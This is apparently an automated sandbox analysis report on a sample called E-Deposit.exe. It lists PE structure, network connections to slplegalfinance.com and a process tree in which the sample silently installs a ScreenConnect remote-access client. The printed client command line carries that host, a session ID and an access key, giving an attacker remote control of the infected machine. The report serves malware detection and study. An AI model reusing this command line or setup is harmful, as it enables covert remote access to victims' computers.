                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      FILES0x163d40x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3962220149253731
                                                                                      FILES0x9c3d40x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111589431762695
                                                                                      FILES0x2409d40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415066442757009
                                                                                      FILES0x25b5d40x2ec318PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9810924530029297
                                                                                      FILES0x5478ec0x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                      RT_MANIFEST0x548eec0x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                      DLLImport
                                                                                      mscoree.dllCorBindToRuntimeEx
                                                                                      KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                      OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 6, 2025 11:37:59.563664913 CET49705443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:37:59.563702106 CET44349705185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:37:59.563849926 CET49705443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:00.215853930 CET49705443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:00.215872049 CET44349705185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:00.215945005 CET44349705185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:02.299088001 CET49706443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:02.299119949 CET44349706185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:02.299266100 CET49706443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:02.301486015 CET49706443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:02.301497936 CET44349706185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:02.301547050 CET44349706185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:05.343837023 CET49707443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:05.343874931 CET44349707185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:05.343940020 CET49707443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:05.346157074 CET49707443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:05.346168041 CET44349707185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:05.346215010 CET44349707185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:10.449062109 CET49708443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:10.449096918 CET44349708185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:10.449224949 CET49708443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:10.452356100 CET49708443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:10.452369928 CET44349708185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:10.452418089 CET44349708185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:18.711363077 CET49742443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:18.711402893 CET44349742185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:18.711519003 CET49742443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:18.713764906 CET49742443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:18.713784933 CET44349742185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:18.713852882 CET44349742185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:32.098958015 CET49821443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:32.098984003 CET44349821185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:32.099047899 CET49821443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:32.102163076 CET49821443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:32.102178097 CET44349821185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:32.102238894 CET44349821185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:52.234383106 CET49945443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:52.234430075 CET44349945185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:52.234519005 CET49945443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:52.238250971 CET49945443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:38:52.238260984 CET44349945185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:38:52.238292933 CET44349945185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:39:19.585905075 CET49986443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:39:19.585963011 CET44349986185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:39:19.586029053 CET49986443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:39:19.588756084 CET49986443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:39:19.588768959 CET44349986185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:39:19.588821888 CET44349986185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:39:57.988718987 CET49987443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:39:57.988749981 CET44349987185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:39:57.988836050 CET49987443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:39:57.991672039 CET49987443192.168.2.5185.143.228.176
                                                                                      Jan 6, 2025 11:39:57.991686106 CET44349987185.143.228.176192.168.2.5
                                                                                      Jan 6, 2025 11:39:57.991738081 CET44349987185.143.228.176192.168.2.5
                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Jan 6, 2025 11:37:59.508064985 CET5531653192.168.2.51.1.1.1
                                                                                      Jan 6, 2025 11:37:59.521527052 CET53553161.1.1.1192.168.2.5
                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Jan 6, 2025 11:37:59.508064985 CET192.168.2.51.1.1.10xcdfStandard query (0)slplegalfinance.comA (IP address)IN (0x0001)false
                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Jan 6, 2025 11:37:59.521527052 CET1.1.1.1192.168.2.50xcdfNo error (0)slplegalfinance.com185.143.228.176A (IP address)IN (0x0001)false

                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:05:37:52
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Users\user\Desktop\E-Deposit.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\E-Deposit.exe"
                                                                                      Imagebase:0x2a0000
                                                                                      File size:5'627'248 bytes
                                                                                      MD5 hash:70D47FA2E078F04400D3D1B236245678
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2031799419.0000000005C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.2005812083.00000000002B6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2035925464.0000000007AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.2023342394.0000000003251000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:05:37:53
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                                                                                      Imagebase:0x300000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:3
                                                                                      Start time:05:37:54
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Windows\System32\msiexec.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                      Imagebase:0x7ff64f830000
                                                                                      File size:69'632 bytes
                                                                                      MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Target ID:4
                                                                                      Start time:05:37:54
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 0753C52DEC0A493B425F25C67CDC614C C
                                                                                      Imagebase:0x300000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:5
                                                                                      Start time:05:37:54
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI8413.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5866656 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                      Imagebase:0x120000
                                                                                      File size:61'440 bytes
                                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:6
                                                                                      Start time:05:37:55
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding FCB4ADDE1767C5B22D934331E22A67F2
                                                                                      Imagebase:0x300000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:05:37:57
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 9CCC608124B9911F2B52810F2F7C9978 E Global\MSI0000
                                                                                      Imagebase:0x300000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:05:37:57
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=2d5fcbc9-2c6e-47f4-840c-d5cb02c072a5&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
                                                                                      Imagebase:0xf70000
                                                                                      File size:95'512 bytes
                                                                                      MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:9
                                                                                      Start time:05:37:58
                                                                                      Start date:06/01/2025
                                                                                      Path:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "24f3f134-385f-4f81-b2ec-597f84d7215f" "User"
                                                                                      Imagebase:0x770000
                                                                                      File size:602'392 bytes
                                                                                      MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.2064444724.0000000000772000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.3269847777.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:15.5%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:33.3%
                                                                                        Total number of Nodes:15
                                                                                        Total number of Limit Nodes:1
                                                                                        execution_graph 28347 14d41f0 28348 14d420f 28347->28348 28349 14d43ed 28348->28349 28352 5b514b0 28348->28352 28356 5b514c0 28348->28356 28353 5b514c0 28352->28353 28354 5b514d4 28353->28354 28360 5b52d07 28353->28360 28354->28349 28357 5b514c5 28356->28357 28358 5b514d4 28357->28358 28359 5b52d07 RtlGetVersion 28357->28359 28358->28349 28359->28358 28361 5b52d1d 28360->28361 28362 5b52e2c 28361->28362 28363 5b52f0c RtlGetVersion 28361->28363 28362->28354 28364 5b52fca 28363->28364 28364->28354

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 65 5b52d07-5b52de6 78 5b52e58-5b52e6d 65->78 79 5b52de8-5b52dfc 65->79 86 5b52ead-5b52ec8 78->86 87 5b52e6f-5b52e8b 78->87 82 5b52e02 79->82 83 5b52dfe-5b52e00 79->83 84 5b52e05-5b52e26 call 5b52560 82->84 83->84 96 5b52e2c-5b52e57 84->96 97 5b52ef8-5b52fc8 RtlGetVersion 84->97 92 5b52eca-5b52ece 86->92 99 5b52e95-5b52eab 87->99 100 5b52e8d 87->100 94 5b52ed0 92->94 95 5b52ed9 92->95 94->95 95->97 107 5b52fd1-5b53014 97->107 108 5b52fca-5b52fd0 97->108 99->92 100->99 112 5b53016 107->112 113 5b5301b-5b53022 107->113 108->107 112->113
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2031560885.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5b50000_E-Deposit.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: LR]q$`Q]q$`Q]q
                                                                                        • API String ID: 0-91395142
                                                                                        • Opcode ID: a6bc4facb622a59e4ee503cf9ab36ae39a2b38a9879aa2312cd9c9ca8df9cb1e
                                                                                        • Instruction ID: f913e6461c4beefa2945ca7bd5bd2a7e5429d415513f69b501b43d4aae586ad3
                                                                                        • Opcode Fuzzy Hash: a6bc4facb622a59e4ee503cf9ab36ae39a2b38a9879aa2312cd9c9ca8df9cb1e
                                                                                        • Instruction Fuzzy Hash: C6812171A063A48FDB159F78C8247DDBFB5FF46210F0540EAC448EB291DB74A948CB96

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 114 5b5ba30-5b5bad2 call 5b5ba30 call 5b5b318 * 2 call 5b5a9b8 129 5b5bbb4-5b5bbbe 114->129 130 5b5bad8-5b5bada 114->130 131 5b5bae0-5b5bae6 130->131 132 5b5bbbf-5b5bc1f 130->132 133 5b5bc26-5b5bc5a 131->133 134 5b5baec-5b5bafe 131->134 132->133 142 5b5bc5c-5b5bcb0 133->142 139 5b5bb70-5b5bbae call 5b5b794 134->139 140 5b5bb00-5b5bb68 134->140 139->129 139->130 140->139 162 5b5bcb2-5b5bcc3 142->162 163 5b5bcc9-5b5bcca 142->163 162->163 163->142 164 5b5bccc-5b5bcec call 5b5ba30 163->164 167 5b5bda0-5b5bda9 164->167 168 5b5bdb4-5b5bdbb 167->168 169 5b5bdab-5b5bdae 167->169 171 5b5bdc1-5b5be00 call 5b5b318 168->171 172 5b5bf9f-5b5bfa8 168->172 169->168 170 5b5bcf1-5b5bcfd 169->170 173 5b5bd03-5b5bd1c 170->173 174 5b5bfa9-5b5bff4 170->174 192 5b5be02-5b5be07 171->192 193 5b5be09-5b5be16 171->193 179 5b5bd93-5b5bd9d 173->179 180 5b5bd1e-5b5bd8b 173->180 194 5b5bffe-5b5c01d 174->194 179->167 180->179 196 5b5be19-5b5be56 call 5b5a9b8 192->196 193->196 201 5b5c023-5b5c042 194->201 202 5b5c1bd-5b5c1c7 194->202 206 5b5bf90-5b5bf99 196->206 207 5b5c044-5b5c0a3 call 5b5b318 201->207 208 5b5c0ab-5b5c0ba 201->208 206->172 209 5b5be5b-5b5be9a 206->209 207->208 208->202 213 5b5c0c0-5b5c0f9 208->213 224 5b5bf11-5b5bf66 209->224 225 5b5be9c-5b5bf09 209->225 213->202 226 5b5c0ff-5b5c102 213->226 224->206 241 5b5bf68-5b5bf6a 224->241 225->224 226->202 228 5b5c108-5b5c10b 226->228 231 5b5c10d-5b5c111 228->231 232 5b5c129-5b5c13b 228->232 233 5b5c113-5b5c117 231->233 234 5b5c11f-5b5c123 231->234 239 5b5c13d-5b5c1a0 232->239 240 5b5c1a8-5b5c1b7 232->240 233->234 234->232 235 5b5c1c8-5b5c20f 234->235 239->240 240->202 240->213 241->206 244 5b5bf6c-5b5bf8b 241->244 244->172 254 5b5bf8d 244->254 254->206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2031560885.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5b50000_E-Deposit.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 4']q$4']q$4']q$4']q$4']q
                                                                                        • API String ID: 0-4248691736
                                                                                        • Opcode ID: ef212d590da5a7a8c577ebc036b8025d2dda7393f412a0d3a257be0b1f491fab
                                                                                        • Instruction ID: cc74293209d33968c3e108498347785971aa51803d3455151040095fbb7b2d2f
                                                                                        • Opcode Fuzzy Hash: ef212d590da5a7a8c577ebc036b8025d2dda7393f412a0d3a257be0b1f491fab
                                                                                        • Instruction Fuzzy Hash: A0428E74A006058FCB18DF69D480AAEBBF6FF88310F148569E41A9B7A5DB34EC45CF90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 514 5b587b8-5b58803 call 5b53690 663 5b58805 call 5b59430 514->663 664 5b58805 call 5b54e40 514->664 665 5b58805 call 5b587b8 514->665 666 5b58805 call 5b587a8 514->666 518 5b5880b-5b5886d call 5b5a0d1 660 5b5886f call 5b5f455 518->660 661 5b5886f call 5b5f53e 518->661 524 5b58875-5b588df 656 5b588e1 call 5b72c81 524->656 657 5b588e1 call 5b72c90 524->657 530 5b588e7-5b589d4 541 5b59425-5b5943c 530->541 542 5b589da-5b58a0f 530->542 545 5b5943e-5b5946a 541->545 546 5b5946b-5b594c5 call 5b54e40 call 5b59b38 541->546 542->541 547 5b58a15-5b58a4a 542->547 545->546 562 5b594cb-5b59514 546->562 547->541 551 5b58a50-5b58a85 547->551 551->541 554 5b58a8b-5b58ac0 551->554 554->541 558 5b58ac6-5b58afb 554->558 558->541 563 5b58b01-5b58b1c 558->563 566 5b58b22-5b58b4e 563->566 567 5b58bab-5b58bbe 563->567 574 5b58b50-5b58b94 566->574 575 5b58b9c-5b58ba5 566->575 569 5b58bd7-5b58be6 567->569 570 5b58bc0-5b58bd5 567->570 571 5b58bec-5b58bf2 569->571 570->571 667 5b58bf4 call 5b7370f 571->667 668 5b58bf4 call 5b7495a 571->668 574->575 575->566 575->567 576 5b58bfa-5b58c13 578 5b58c15-5b58c8c 576->578 579 5b58c8e-5b58cab 576->579 578->579 583 5b58cad-5b58cc2 578->583 580 5b58cc8-5b59013 579->580 629 5b591ad-5b591c9 580->629 630 5b59019-5b59191 580->630 583->580 632 5b591d7 629->632 633 5b591cb 629->633 658 5b59193 call 5b74c90 630->658 659 5b59193 call 5b74c50 630->659 632->541 633->632 654 5b59199-5b591a7 654->629 654->630 656->530 657->530 658->654 659->654 660->524 661->524 663->518 664->518 665->518 666->518 667->576 668->576
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2031560885.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5b50000_E-Deposit.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: bea39423f04816f793926b73ecf8d1e1e7689288b7fba26f6998b05698e338f7
                                                                                        • Instruction ID: 8741810e0a88606078399d9d35ac448218de37b6c8a32f0ce05a8b6909de837b
                                                                                        • Opcode Fuzzy Hash: bea39423f04816f793926b73ecf8d1e1e7689288b7fba26f6998b05698e338f7
                                                                                        • Instruction Fuzzy Hash: F3627B34A00319CFCB159F69D8487ADBBBAFF89300F148599E809A7395DB35AD85CF90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 670 5b587a8-5b58803 call 5b53690 821 5b58805 call 5b59430 670->821 822 5b58805 call 5b54e40 670->822 823 5b58805 call 5b587b8 670->823 824 5b58805 call 5b587a8 670->824 675 5b5880b-5b5886d call 5b5a0d1 818 5b5886f call 5b5f455 675->818 819 5b5886f call 5b5f53e 675->819 681 5b58875-5b588df 814 5b588e1 call 5b72c81 681->814 815 5b588e1 call 5b72c90 681->815 687 5b588e7-5b589d4 698 5b59425-5b5943c 687->698 699 5b589da-5b58a0f 687->699 702 5b5943e-5b5946a 698->702 703 5b5946b-5b594c5 call 5b54e40 call 5b59b38 698->703 699->698 704 5b58a15-5b58a4a 699->704 702->703 719 5b594cb-5b59514 703->719 704->698 708 5b58a50-5b58a85 704->708 708->698 711 5b58a8b-5b58ac0 708->711 711->698 715 5b58ac6-5b58afb 711->715 715->698 720 5b58b01-5b58b1c 715->720 723 5b58b22-5b58b4e 720->723 724 5b58bab-5b58bbe 720->724 731 5b58b50-5b58b94 723->731 732 5b58b9c-5b58ba5 723->732 726 5b58bd7-5b58be6 724->726 727 5b58bc0-5b58bd5 724->727 728 5b58bec-5b58bf2 726->728 727->728 825 5b58bf4 call 5b7370f 728->825 826 5b58bf4 call 5b7495a 728->826 731->732 732->723 732->724 733 5b58bfa-5b58c13 735 5b58c15-5b58c8c 733->735 736 5b58c8e-5b58cab 733->736 735->736 740 5b58cad-5b58cc2 735->740 737 5b58cc8-5b59013 736->737 786 5b591ad-5b591c9 737->786 787 5b59019-5b59191 737->787 740->737 789 5b591d7 786->789 790 5b591cb 786->790 816 5b59193 call 5b74c90 787->816 817 5b59193 call 5b74c50 787->817 789->698 790->789 811 5b59199-5b591a7 811->786 811->787 814->687 815->687 816->811 817->811 818->681 819->681 821->675 822->675 823->675 824->675 825->733 826->733
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.2031560885.0000000005B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B50000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_5b50000_E-Deposit.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID: 0-3916222277
                                                                                        • Opcode ID: 0551a3d9a68301f63f97c796f189eed37494e5f1c75264d472a917dd01d41102
                                                                                        • Instruction ID: e55f8c254cb21677bbaf156a2b7033a762be71ec10fb0506b9480ae7ffd1d22c
                                                                                        • Opcode Fuzzy Hash: 0551a3d9a68301f63f97c796f189eed37494e5f1c75264d472a917dd01d41102
                                                                                        • Instruction Fuzzy Hash: 30425E34A00319CFCB159F29D9487ADBBBAFF89300F148599E909A7395CB35AD85CF90

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
